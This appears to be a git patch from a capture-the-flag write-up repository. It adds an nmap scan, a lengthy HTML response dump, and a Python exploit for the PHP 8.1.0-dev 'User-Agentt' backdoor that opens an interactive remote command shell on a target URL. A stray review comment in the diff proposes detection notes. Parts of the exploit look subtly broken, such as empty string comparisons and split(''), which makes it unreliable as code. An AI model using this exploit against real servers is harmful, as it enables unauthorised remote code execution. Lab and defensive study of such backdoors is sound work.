From 14d0504e13c115f18d0397756dee998cd36436ee Mon Sep 17 00:00:00 2001
From: Raghuram Subramani
Date: Sat, 24 Sep 2022 01:51:43 -0400
Subject: add agent-t
---
agent-t/exploit.py | 53 ++
agent-t/nmap | 14 +
agent-t/response | 1529 ++++++++++++++++++++++++++++++++++++++++++++++++++++
3 files changed, 1596 insertions(+)
create mode 100644 agent-t/exploit.py
create mode 100644 agent-t/nmap
create mode 100644 agent-t/response
(limited to 'agent-t')
diff --git a/agent-t/exploit.py b/agent-t/exploit.py
new file mode 100644
index 0000000..3bd6e9d
--- /dev/null
+++ b/agent-t/exploit.py
@@ -0,0 +1,53 @@
+# Exploit Title: PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution
+# Date: 23 may 2021
+# Exploit Author: flast101
+# Vendor Homepage: https://www.php.net/
+# Software Link:
+# - https://hub.docker.com/r/phpdaily/php
+# - https://github.com/phpdaily/php
+# Version: 8.1.0-dev
+# Tested on: Ubuntu 20.04
+# References:
+# - https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a
+# - https://github.com/vulhub/vulhub/blob/master/php/8.1-backdoor/README.zh-cn.md
+
+"""
+Blog: https://flast101.github.io/php-8.1.0-dev-backdoor-rce/
+Download: https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/backdoor_php_8.1.0-dev.py
+Contact: flast101.sec@gmail.com
+
+An early release of PHP, the PHP 8.1.0-dev version was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header.
+The following exploit uses the backdoor to provide a pseudo shell ont the host.
+"""
+
+#!/usr/bin/env python3
+import os
+import re
+import requests
+
+host = input("Enter the full host url:\n")
+request = requests.Session()
+response = request.get(host)
+
+if str(response) == '':
+ print("\nInteractive shell is opened on", host, "\nCan't acces tty; job crontol turned off.")
+ try:
+ while 1:
+ cmd = input("$ ")
+ headers = {
+ "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
+ "User-Agentt": "zerodiumsystem('" + cmd + "');"
+ }
+ response = request.get(host, headers = headers, allow_redirects = False)
+ current_page = response.text
+ stdout = current_page.split('',1)
+ text = print(stdout[0])
+ except KeyboardInterrupt:
+ print("Exiting...")
+ exit()
+
+else:
+ print("\r")
+ print(response)
+ print("Host is not available, aborting...")
+ exit()
\ No newline at end of file
diff --git a/agent-t/nmap b/agent-t/nmap
new file mode 100644
index 0000000..6a705a6
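Review bot: The file header explains how the backdoor is triggered but leaves a reader with nothing to recognise or detect it by, even though the only distinguishing traffic this script produces is the misspelled `User-Agentt` request header. I would add a comment beside the `headers` dict such as `# Detection: "User-Agentt" is not a standard header; log and alert on any request that carries it`, and one line in the header block noting that affected builds identify themselves as `PHP/8.1.0-dev` (seen in agent-t/nmap and in the `X-Powered-By` line of agent-t/response) and should be replaced with a build from a clean release. Two smaller style points: `#!/usr/bin/env python3` sits below the comment block and docstring, so it has no effect as a shebang, and `os` and `re` are imported but never used.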
--- /dev/null
+++ b/agent-t/nmap
@@ -0,0 +1,14 @@
+# Nmap 7.93 scan initiated Sat Sep 24 01:44:36 2022 as: nmap -vvv -p 80 -sC -sV -oN nmap 10.10.166.198
+Nmap scan report for 10.10.166.198
+Host is up, received syn-ack (0.21s latency).
+Scanned at 2022-09-24 01:44:37 EDT for 17s
+
+PORT STATE SERVICE REASON VERSION
+80/tcp open http syn-ack PHP cli server 5.5 or later (PHP 8.1.0-dev)
+| http-methods:
+|_ Supported Methods: GET HEAD POST OPTIONS
+|_http-title: Admin Dashboard
+
+Read data files from: /usr/bin/../share/nmap
+Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+# Nmap done at Sat Sep 24 01:44:54 2022 -- 1 IP address (1 host up) scanned in 17.45 seconds
diff --git a/agent-t/response b/agent-t/response
new file mode 100644
index 0000000..d9e400a
--- /dev/null
+++ b/agent-t/response
@@ -0,0 +1,1529 @@
+ + + + + + + + + + + + Admin Dashboard + + + + + + + + + + + + + +
+ + + + + + +
+ + +
+ + + + + + +
+ + +
+

Dashboard

+ Generate Report +
+ + +
+ + +
+
+
+
+
+
+ Earnings (Monthly)
+
$40,000
+
+
+ +
+
+
+
+
+ + +
+
+
+
+
+
+ Earnings (Annual)
+
$215,000
+
+
+ +
+
+
+
+
+ + +
+
+
+
+
+
Tasks +
+
+
+
50%
+
+
+
+
+
+
+
+
+
+ +
+
+
+
+
+ + +
+
+
+
+
+
+ Pending Requests
+
18
+
+
+ +
+
+
+
+
+
+ + + +
+ + +
+
+ +
+
Earnings Overview
+ +
+ +
+
+ +
+
+
+
+ + +
+
+ +
+
Revenue Sources
+ +
+ +
+
+ +
+
+ + Direct + + + Social + + + Referral + +
+
+
+
+
+ + +
+ + +
+ + +
+
+
Projects
+
+
+

Server Migration 20%

+
+
+
+

Sales Tracking 40%

+
+
+
+

Customer Database 60%

+
+
+
+

Payout Details 80%

+
+
+
+

Account Setup Complete!

+
+
+
+
+
+ + +
+
+
+
+ Primary +
#4e73df
+
+
+
+
+
+
+ Success +
#1cc88a
+
+
+
+
+
+
+ Info +
#36b9cc
+
+
+
+
+
+
+ Warning +
#f6c23e
+
+
+
+
+
+
+ Danger +
#e74a3b
+
+
+
+
+
+
+ Secondary +
#858796
+
+
+
+
+
+
+ Light +
#f8f9fc
+
+
+
+
+
+
+ Dark +
#5a5c69
+
+
+
+
+ +
+ +
+ + +
+
+
Illustrations
+
+
+
+ ... +
+

Add some quality, svg illustrations to your project courtesy of unDraw, a + constantly updated collection of beautiful svg images that you can use + completely free and without attribution!

+ Browse Illustrations on + unDraw → +
+
+ + +
+
+
Development Approach
+
+
+

SB Admin 2 makes extensive use of Bootstrap 4 utility classes in order to reduce + CSS bloat and poor page performance. Custom CSS classes are used to create + custom components and custom utility classes.

+

Before working with this theme, you should become familiar with the + Bootstrap framework, especially the utility classes.

+
+
+ +
+
+ +
+ + +
+ + + +
+
+ +
+
+ + +
+ + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
* Trying 10.10.166.198:80... + % Total % Received % Xferd Average Speed Time Time Time Current + Dload Upload Total Spent Left Speed + 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0* Connected to 10.10.166.198 (10.10.166.198) port 80 (#0) +> GET / HTTP/1.1 +> Host: 10.10.166.198 +> User-Agent: curl/7.85.0 +> Accept: */* +> +* Mark bundle as not supporting multiuse +< HTTP/1.1 200 OK +< Host: 10.10.166.198 +< Date: Sat, 24 Sep 2022 05:45:57 GMT +< Connection: close +< X-Powered-By: PHP/8.1.0-dev +< Content-type: text/html; charset=UTF-8 +< +{ [1274 bytes data] + + + + + + + + + + + + Admin Dashboard + + + + + + + + + + + + + +
+ + + + + + +
+ + +
+ + + + + + +
+ + +
+

Dashboard

+ Generate Report +
+ + +
+ + +
+
+
+
+
+
+ Earnings (Monthly)
+
$40,000
+
+
+ +
+
+
+
+
+ + +
+
+
+
+
+
+ Earnings (Annual)
+
$215,000
+
+
+ +
+
+
+
+
+ + +
+
+
+
+
+
Tasks +
+
+
+
50%
+
+
+
+
+
+
+
+
+
+ +
+
+
+
+
+ + +
+
+
+
+
+
+ Pending Requests
+
18
+
+
+ +
+
+
+
+
+
+ + + +
+ + +
+
+ +
+
Earnings Overview
+ +
+ +
+
+ +
+
+
+
+ + +
+
+ +
+
Revenue Sources
+ +
+ +
+
+ +
+
+ + Direct + + + Social + + + Referral + +
+
+
+
+
+ + +
+ + +
+ + +
+
+
Projects
+
+
+

Server Migration 20%

+
+
+
+

Sales Tracking 40%

+
+
+
+

Customer Database 60%

+
+
+
+

Payout Details 80%

+
+
+
+

Account Setup Complete!

+
+
+
+
+
+ + +
+
+
+
+ Primary +
#4e73df
+
+
+
+
+
+
+ Success +
#1cc88a
+
+
+
+
+
+
+ Info +
#36b9cc
+
+
+
+
+
+
+ Warning +
#f6c23e
+
+
+
+
+
+
+ Danger +
#e74a3b
+
+
+
+
+
+
+ Secondary +
#858796
+
+
+
+
+
+
+ Light +
#f8f9fc
+
+
+
+
+ 100 40768 0 40768 0 0 45367 0 --:--:-- --:--:-- --:--:-- 45348
+
+ Dark +
#5a5c69
+
+
+
+
+ +
+ +
+ + +
+
+
Illustrations
+
+
+
+ ... +
+

Add some quality, svg illustrations to your project courtesy of unDraw, a + constantly updated collection of beautiful svg images that you can use + completely free and without attribution!

+ Browse Illustrations on + unDraw → +
+
+ + +
+
+
Development Approach
+
+
+

SB Admin 2 makes extensive use of Bootstrap 4 utility classes in order to reduce + CSS bloat and poor page performance. Custom CSS classes are used to create + custom components and custom utility classes.

+

Before working with this theme, you should become familiar with the + Bootstrap framework, especially the utility classes.

+
+
+ +
+
+ +
+ + +
+ + + +
+
+ +
+
+ + +
+ + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
\ No newline at end of file -- cgit v1.2.3